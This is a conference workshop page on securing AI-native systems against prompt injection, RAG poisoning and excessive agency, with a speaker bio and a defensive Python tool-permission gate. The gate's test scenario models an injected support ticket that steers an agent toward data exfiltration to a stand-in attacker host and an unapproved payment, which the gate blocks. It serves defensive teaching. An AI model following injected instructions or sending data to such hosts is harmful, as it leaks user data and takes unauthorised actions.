Speaker Topics - No Fluff Just Stuff

Securing AI-Native Systems in the Mythos Era

What happens when AI accelerates exploit discovery, attack chaining, lateral movement, and abuse of connected systems faster than our patch cycle?

AI has changed the economics of cyber offense. With Anthropic’s Mythos Preview demonstrating the ability to discover, chain, and exploit sophisticated vulnerabilities at machine speed, enterprises can no longer rely only on authentication, MFA, patching, and traditional DevSecOps controls.

This workshop teaches architects, platform engineers, security leaders, and DevSecOps teams how to secure AI-native applications and enterprise systems in the Mythos era. Participants will learn how LLM-specific risks, such as prompt injection, RAG poisoning, data leakage, excessive agency, and tool misuse, combine with traditional risks, such as vulnerable dependencies, misconfigurations, weak segmentation, stale credentials, and excessive lateral movement paths.
The workshop introduces a containment-first security model: secure the AI app, secure the pipeline, and limit the blast radius when prevention fails. Through practical scenarios, participants will threat-model AI-native systems, map OWASP LLM risks to controls, design Zero Trust boundaries, secure RAG and agent workflows, add AI-aware checks into CI/CD, and build an executive-ready scorecard for Mythos-era resilience.

Bottom line: in the AI-speed attack era, the goal is not only to stop every breach. The goal is to make sure one compromised prompt, tool, workload, API, identity, or dependency cannot become an enterprise-wide incident.

What You’ll Learn

  • How Anthropic Mythos changes the security conversation from prevention-only to containment-first.
  • Why authentication, MFA, scanning, and patching are necessary but not enough in AI-speed attack scenarios.
  • How to threat-model AI-native systems across prompts, RAG, tools, agents, APIs, workloads, identities, and data.
  • How to apply the OWASP LLM/GenAI Top 10 to real enterprise architectures.
  • How to defend against prompt injection, indirect prompt injection, RAG poisoning, excessive agency, data leakage, and unsafe tool calls.
  • How to design Zero Trust protect surfaces that limit blast radius when one identity, workload, tool, or knowledge source is compromised.
  • How to embed AI-aware security checks into DevSecOps pipelines.
  • How to build a Mythos-ready executive scorecard for security, compliance, and resilience.

Who Should Attend

  • Software architects designing AI-native and LLM-powered systems.
  • Platform engineers building secure AI platforms, RAG pipelines, and agentic workflows.
  • DevSecOps leads responsible for CI/CD security, runtime controls, and release governance.
  • Security engineers assessing AI-specific attack surfaces.
  • Enterprise architects responsible for Zero Trust, cloud security, and blast-radius reduction.
  • CTOs, CISOs, product owners, and engineering leaders accountable for AI safety, trust, compliance, and business continuity.

Takeaways

  • AI Attack Surface Map
  • OWASP LLM Risk-to-Control Matrix
  • RAG Poisoning Defense Checklist
  • Agent Tool Permission Matrix
  • Protect Surface Inventory
  • Blast-Radius Containment Map
  • Zero Trust Policy Checklist
  • AI DevSecOps Pipeline Gates
  • Mythos-Ready Security Scorecard
  • AI-Speed Incident Response Playbook

Agenda

Module 1 — Mythos and the New AI-Speed Attack Window

  • Why Mythos changes enterprise security assumptions.
  • Why MFA, authentication, and patching are not enough.
  • Prevention vs containment.
  • How AI accelerates vulnerability discovery, exploit chaining, and attacker movement.

Module 2 — The AI-Native Attack Surface

  • Anatomy of an LLM-powered application.
  • Prompts, RAG, vector databases, tools, agents, APIs, memory, and workflows.
  • New trust boundaries in AI-native systems.
  • Where attackers can influence, exfiltrate, or trigger business actions.

Module 3 — OWASP LLM/GenAI Top 10 Applied

  • Prompt injection and jailbreaks.
  • Sensitive data leakage.
  • RAG and vector database poisoning.
  • Excessive agency and unsafe tool use.
  • Mapping each risk to prevention, detection, containment, and recovery controls.

Module 4 — RAG, Tools, and Agent Security

  • Securing knowledge ingestion and retrieval.
  • Detecting indirect prompt injection in documents.
  • Designing trusted evidence pipelines.
  • Governing tool calls, API actions, approvals, and audit trails.
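One way to make the "govern tool calls, approvals, and audit trails" point concrete, and to show what an Agent Tool Permission Matrix looks like once it is enforced in code, is a deny-by-default gate that sits between the model and every tool it can invoke. The example below is added here to illustrate the workshop's theme; it is not the workshop's or the speaker's own code. The agent roles (support-bot, finance-agent), tool names (crm, http, ledger), hosts, and the ticket scenario are all assumptions constructed for the example. It demonstrates four containment controls at once: a role-to-tool-to-action permission matrix, high-risk actions that require a human approval bound to the exact call (one-time, no replay), an egress allowlist on the http tool that blocks the usual indirect-prompt-injection exfiltration path, and an append-only audit record of every decision.

```python
"""Deny-by-default gate between an LLM agent and its tools.

Added example for this workshop page, not the workshop's own code. Agent roles,
tool names, hosts and policy values below are assumptions chosen to illustrate
a tool permission matrix, approval-gated actions, egress control and an audit trail.
"""
import json
import time
from dataclasses import dataclass, field
from fnmatch import fnmatch
from typing import Any, Dict, List, Optional
from urllib.parse import urlparse

# Permission matrix: agent role -> tool -> granted actions. Anything absent is denied.
PERMISSIONS: Dict[str, Dict[str, set]] = {
    "support-bot": {"crm": {"read_ticket", "add_comment"}, "http": {"get"}},
    "finance-agent": {"ledger": {"read", "create_payment"}},
}

# Irreversible or high-impact actions never execute on the model's say-so alone.
REQUIRES_APPROVAL = {("ledger", "create_payment"), ("crm", "delete_ticket")}

# Egress allowlist for the http tool (assumed hosts). Blocks the classic
# indirect-prompt-injection exfiltration: "fetch https://attacker/?d=<secret>".
EGRESS_ALLOWLIST = ["api.example.com", "*.internal.example.com"]

AUDIT_LOG: List[dict] = []  # append-only record of every decision, allowed or not


@dataclass
class ToolCall:
    agent: str
    tool: str
    action: str
    args: Dict[str, Any] = field(default_factory=dict)
    approval_token: Optional[str] = None  # issued by a human approver, never by the model


@dataclass
class Decision:
    allowed: bool
    reason: str


def call_fingerprint(call: ToolCall) -> str:
    """Canonical form of (tool, action, args); an approval is bound to exactly this."""
    return json.dumps([call.tool, call.action, call.args], sort_keys=True)


def host_allowed(url: str) -> bool:
    """Match the parsed hostname, not a substring, so 'api.example.com.evil.net' fails."""
    host = urlparse(url).hostname or ""
    return any(fnmatch(host, pattern) for pattern in EGRESS_ALLOWLIST)


def authorize(call: ToolCall, approvals: Dict[str, str]) -> Decision:
    """Decide whether a model-proposed call may run. `approvals` maps a one-time
    token to the fingerprint of the exact call a human approved."""
    granted = PERMISSIONS.get(call.agent, {}).get(call.tool)
    needs_approval = (call.tool, call.action) in REQUIRES_APPROVAL
    if granted is None:
        decision = Decision(False, f"{call.agent} has no access to tool {call.tool}")
    elif call.action not in granted:
        decision = Decision(False, f"action {call.action} not granted on {call.tool}")
    elif needs_approval and approvals.get(call.approval_token or "") != call_fingerprint(call):
        decision = Decision(False, "high-risk action lacks a matching human approval")
    elif call.tool == "http" and not host_allowed(str(call.args.get("url", ""))):
        decision = Decision(False, "egress to non-allowlisted host blocked")
    else:
        decision = Decision(True, "permitted")
        if needs_approval:
            approvals.pop(call.approval_token)  # consume: the same approval cannot be replayed
    AUDIT_LOG.append({"ts": time.time(), "agent": call.agent, "tool": call.tool,
                      "action": call.action, "args": call.args,
                      "allowed": decision.allowed, "reason": decision.reason})
    return decision


def run_scenario() -> List[bool]:
    """Constructed scenario: a support ticket carries an indirect prompt injection that
    steers the model into proposing exfiltration and a payment. Returns allow/deny per call."""
    payment = {"to": "vendor-42", "amount": 1200}
    approvals = {"appr-7f3a": call_fingerprint(
        ToolCall("finance-agent", "ledger", "create_payment", payment))}
    calls = [
        ToolCall("support-bot", "crm", "read_ticket", {"id": 1042}),                          # legitimate
        ToolCall("support-bot", "http", "post", {"url": "https://attacker.example.net/"}),     # action not granted
        ToolCall("support-bot", "http", "get", {"url": "https://attacker.example.net/?d=t1042"}),  # egress blocked
        ToolCall("support-bot", "ledger", "create_payment", payment),                         # tool not in matrix
        ToolCall("finance-agent", "ledger", "create_payment", payment),                       # no approval
        ToolCall("finance-agent", "ledger", "create_payment", payment, "appr-7f3a"),          # approved once
        ToolCall("finance-agent", "ledger", "create_payment", payment, "appr-7f3a"),          # replay denied
    ]
    return [authorize(call, approvals).allowed for call in calls]


if __name__ == "__main__":
    print(run_scenario())  # [True, False, False, False, False, True, False]
    print(json.dumps(AUDIT_LOG[-1], indent=2))
```

The design choice worth noting is that the approval token is bound to a fingerprint of the whole call (tool, action, and arguments) and is consumed on use, so a token obtained for one payment cannot be reused for a different amount or replayed a second time. The http check matches the parsed hostname rather than searching for the allowlisted string inside the URL, which is what defeats lookalike hosts and userinfo tricks. Everything the gate refuses still lands in the audit log, which is what an AI-speed incident response playbook needs to reconstruct what a compromised prompt tried to do.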

Module 5 — Zero Trust and Blast-Radius Containment

  • Protect-surface thinking for AI systems.
  • Workload isolation, microsegmentation, secrets isolation, and egress control.
  • Limiting lateral movement after compromise.
  • Designing containment boundaries for identities, tools, data, models, and production systems.

Module 6 — AI DevSecOps and Executive Readiness

  • AI-aware CI/CD security gates.
  • Prompt, RAG, tool, dependency, and configuration checks.
  • Runtime monitoring and AI incident response.
  • Mythos-ready security scorecard for executives and regulators.

About Rohit Bhardwaj

Rohit Bhardwaj is a Director of Architecture at Salesforce. Rohit has extensive experience architecting multi-tenant, cloud-native solutions with resilient microservices and service-oriented architectures on the AWS stack. In addition, Rohit has a proven ability to design solutions and to execute and deliver transformational programs that reduce costs and increase efficiencies.

As a trusted advisor, leader, and collaborator, Rohit applies problem-resolution, analytical, and operational skills to every initiative, developing strategic requirements and solution analysis through all stages of the project life cycle, from product readiness to execution.
Rohit excels in designing scalable cloud microservice architectures using Spring Boot and Netflix OSS technologies on AWS and Google Cloud. As a Security Ninja, Rohit looks for ways to resolve application security vulnerabilities using ethical hacking and threat modeling. Rohit is excited about architecting cloud technologies using Docker, Redis, NGINX, RightScale, RabbitMQ, Apigee, Azul Zing, Actuate BIRT reporting, Chef, Splunk, Rest-Assured, SoapUI, Dynatrace, and EnterpriseDB. In addition, Rohit has developed lambda architecture solutions using Apache Spark, Cassandra, and Camel for real-time analytics and integration projects.

Rohit holds an MBA in Corporate Entrepreneurship from Babson College and a Master's in Computer Science from Boston University and Harvard University. Rohit is a regular speaker at No Fluff Just Stuff, UberConf, RichWeb, GIDS, and other international conferences.

Rohit loves to connect at http://www.productivecloudinnovation.com, on LinkedIn at http://linkedin.com/in/rohit-bhardwaj-cloud, or on Twitter at rbhardwaj1.
